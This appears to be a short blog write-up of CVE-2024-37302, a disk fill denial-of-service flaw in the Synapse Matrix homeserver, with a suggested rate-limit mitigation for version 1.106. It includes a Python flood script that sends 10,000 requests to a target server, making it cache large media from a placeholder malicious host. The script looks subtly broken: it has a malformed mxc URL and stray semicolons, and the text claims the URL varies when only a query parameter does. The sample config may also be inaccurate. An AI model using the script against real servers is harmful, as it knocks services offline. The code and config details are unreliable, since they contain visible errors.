CVE-2024-37302: Synapse Disk Fill Attack Vulnerability and Partial Mitigation in Synapse 1.106

Synapse, an open-source Matrix homeserver, is prone to a disk fill attack prior to the 1.106 version. In this attack, an unauthenticated adversary can exploit this vulnerability to compel Synapse to download and cache substantial amounts of remote media. The default rate limit strategy is inadequate for tackling this issue, resulting in a denial of service that can range from failed media uploads/downloads to complete unavailability of the Synapse process.

This post will discuss the details of this vulnerability, how an attacker can exploit it, and the possible consequences. The post also includes information on the partial mitigation introduced in Synapse 1.106 with a new "leaky bucket" rate limit on remote media downloads.

Original References

Link 1: Synapse GitHub Repository

Link 2: Synapse Release Notes (1.106)

Link 3: CVE-2024-37302 Vulnerability Details

Exploit Details

An attacker can take advantage of this vulnerability by sending numerous requests for large media files from remote servers to be downloaded and cached by a vulnerable Synapse homeserver. The default rate limiting strategy is not capable of handling this attack, and a disk fill can occur in a relatively short amount of time.

Code Snippet

The following Python code snippet demonstrates how an unauthenticated attacker might launch a disk fill attack:

import requests

TARGET_SERVER = "https://target.synapse.server";
REMOTE_MEDIA_URL = "https://malicious.server/large_media_file";

for i in range(1, 10000):
    requests.get(f"{TARGET_SERVER}/_matrix/media/v1/mxc://{REMOTE_MEDIA_URL}?i={i}")

This script sends 10,000 GET requests to the target Synapse server to download a large media file from a remote server. Each request has a slightly different REMOTE_MEDIA_URL to bypass any potential caching mechanisms.

Partial Mitigation in Synapse 1.106

Synapse version 1.106 introduces a partial mitigation for this vulnerability. The new "leaky bucket" rate limit strategy reduces the amount of data a user can request simultaneously. Although it does not fully address the issue, this partial mitigation limits an unauthenticated user's capability to request extensive amounts of data to be cached.

Synapse administrators can configure the "leaky bucket" rate limit settings in the homeserver.yaml configuration file by updating the rc_remote_media section:

rc_remote_media:
  per_second: 10
  burst_count: 50

With these settings, the server allows ten media downloads per second and a burst count of 50.

Conclusion

CVE-2024-37302 exposes a severe vulnerability in Synapse versions before 1.106, where an unauthenticated attacker can induce a disk fill attack by downloading and caching considerable amounts of remote media. The issue remains partly unresolved, and administrators are advised to apply the partial mitigation provided in Synapse 1.106 with the "leaky bucket" rate limit.

To ensure the security of their Synapse homeserver, administrators should keep up to date with security patches and releases of Synapse homeserver software and monitor the server for any abnormal behavior or excessive resource usage.

Timeline

Published on: 12/03/2024 17:15:10 UTC

*Original References*